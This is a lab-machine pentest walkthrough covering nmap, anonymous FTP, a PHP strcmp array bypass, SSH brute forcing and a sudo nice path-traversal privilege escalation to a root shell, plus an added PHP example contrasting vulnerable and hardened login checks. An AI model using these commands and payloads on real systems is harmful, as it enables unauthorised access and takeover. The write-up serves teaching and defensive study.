"Potato Hacks a Machine": A Fun & Interactive Pentest Walkthrough
Introduction
There are machines that fight... There are machines that hide... and then there is this machine: a smug little box sitting at 192.168.238.101, daring me to break in.
What followed was a roller-coaster of ports, protocols, bypasses, and bash tricks... and yes, somewhere in the middle I almost head-butted my monitor.
Let me take you through the full journey, step by step: clean, technical, and with just enough chaos to keep things fun.
Step 1: Full Port Sweep with Nmap
We begin with a trusty, smashing-fast scan of every TCP port, with version detection and default scripts, saving normal output to a file called nmap:
nmap -sCV -p- 192.168.238.101 --min-rate 10000 -oN nmap
Nmap returns:
SSH: port 22
HTTP: port 80
FTP: port... 2112?!
Yes... 2112. The one port number that feels like the machine is trolling us.
Step 2: The Strange FTP on 2112
Of course I try anonymous login:
ftp 192.168.238.101 2112
Boom, I'm in. The FTP greets me with two files:
index.php.bak
welcome.msg
I download both:
get index.php.bak
get welcome.msg
Reading them:
cat welcome.msg
"Welcome, archive user %U@%R ! The local time is: %T"
Nothing useful here... but index.php.bak? Oh boy.
$pass = "potato"; // note Change this password regularly
if($_GET['login']==="1"){
    if (strcmp($_POST['username'], "admin") == 0 && strcmp($_POST['password'], $pass) == 0) {
        setcookie('pass', $pass, ... );
    }
}
We now have:
Username: admin
Password: potato
But where do we login?
Step 3: Gobuster Enters the Scene
I blast the web directory to find hidden paths:
gobuster dir -u http://192.168.238.101/ -w /usr/share/dirb/wordlists/common.txt
And voilà:
/admin/
I rush to the login page, use admin:potato, and... get slapped with "Bad user/password!"
Rude.
Step 4: Rethinking the Login: The strcmp Trick
Looking back at the source code, I notice something juicy:
strcmp() is being used, and its result is checked with == 0 rather than === 0.
If strcmp() receives an array instead of a string (which PHP builds from a parameter like password[]=...), PHP 7 emits a warning and returns NULL instead of an integer. (PHP 8 throws a TypeError here instead, so this trick depends on the target's PHP version.)
NULL == 0 in loose comparison, so PHP treats the check as true.
This is a classic authentication bypass: the fix is to reject non-string input and compare with === 0 (or better, hash_equals()/password_verify()).
So I intercept the request using BurpSuite:
username=admin&password[]=potato
Send it in Repeater. Response: 200 OK.
Victory? Not exactly. The dashboard gave absolutely nothing. A waste of time.
So I pivot.
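To make the bypass concrete from the defender's side, here is an added PHP example (not code from the original post or the target machine) that runs the vulnerable check from index.php.bak next to a hardened version against constructed inputs, including the password[]=potato case. The stored hash, function names and the "admin" username are assumptions for the demo.

```php
<?php
// Vulnerable check, as in index.php.bak: strcmp()'s result is compared with == 0.
// On PHP 7 an array argument makes strcmp() return NULL (with a warning), and
// NULL == 0 is true, so the password check passes. On PHP 8 strcmp() throws a
// TypeError for a non-string, which we catch so the demo runs on both versions.
function login_vulnerable(array $post): bool {
    $pass = "potato"; // hard-coded secret copied from the leaked backup
    try {
        return @strcmp($post['username'] ?? '', "admin") == 0
            && @strcmp($post['password'] ?? '', $pass) == 0;
    } catch (TypeError $e) {
        return false; // PHP 8 fails closed here; PHP 7 never reaches this branch
    }
}

// Hardened check: type-check the input first, then use constant-time
// comparison for the username and a password hash instead of a plaintext secret.
function login_hardened(array $post, string $storedHash): bool {
    $user = $post['username'] ?? null;
    $pw   = $post['password'] ?? null;
    // Arrays (from username[]= or password[]=) are rejected before any comparison.
    if (!is_string($user) || !is_string($pw)) {
        return false;
    }
    if (!hash_equals("admin", $user)) {
        return false;
    }
    return password_verify($pw, $storedHash);
}

// Constructed demo data: the hash stands in for a value stored server-side.
$storedHash = password_hash("potato", PASSWORD_DEFAULT);
$attempts = [
    'valid'  => ['username' => 'admin', 'password' => 'potato'],
    'wrong'  => ['username' => 'admin', 'password' => 'guess'],
    'bypass' => ['username' => 'admin', 'password' => ['potato']], // password[]=potato
];
foreach ($attempts as $name => $post) {
    printf("%-7s vulnerable=%s hardened=%s\n", $name,
        login_vulnerable($post) ? 'ALLOW' : 'deny',
        login_hardened($post, $storedHash) ? 'ALLOW' : 'deny');
}
```

The hardened function denies the bypass attempt on every PHP version, while the vulnerable one allows it only on PHP 7, which is exactly the version dependence that makes this bug easy to miss in a code review.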
Step 5: Brute Force SSH Using Nmap
I decide to brute-force SSH using one of Nmap's built-in scripts:
nmap -p 22 --script=/usr/share/nmap/scripts/ssh-brute.nse 192.168.238.101
After a tense wait... Nmap spits out valid creds:
webadmin : dragon
Now that's what I'm talking about!
Step 6: Logging in Over SSH
ssh webadmin@192.168.238.101
Inside the machine:
cat local.txt
First flag obtained!
I explore /home and discover another user:
florianges/
But the directory is empty. A dead end.
Time to escalate.
Step 7: Privilege Escalation via Sudo & Nice
Running:
sudo -l
Output:
(ALL : ALL) /bin/nice /notes/*
So I can run anything inside /notes/ as root via nice, since nice simply executes whatever program it is handed.
I check inside /notes/: nothing exploitable.
Then a fun idea hits me:
What if I reference a file outside the /notes directory using path traversal?
sudo matches the argument against the pattern /notes/* as a glob, and a wildcard in an argument position also matches slashes, so the rule happily accepts:
/notes/../home/webadmin/shell.sh
Time to craft the payload:
echo -e '#!/bin/bash\nbash -i' > ~/shell.sh
chmod +x ~/shell.sh
Now execute it with sudo:
sudo /bin/nice /notes/../home/webadmin/shell.sh
ROOTED. Instant interactive root shell.
cat /root/proof.txt
And there it is: the final flag. Game over. Machine pwned.
Conclusion
This machine was a fun mix of:
Weird FTP port choices
Authentication bypass techniques
A red herring login page
Nmap brute-forcing
Clever sudo exploitation using path traversal
The final privesc via nice was the cherry on top: simple, elegant, and satisfying.
If you enjoyed this walkthrough, share it, clap it, and stay tuned. More hacking adventures are on the way.
- Ishhishneet (Potato)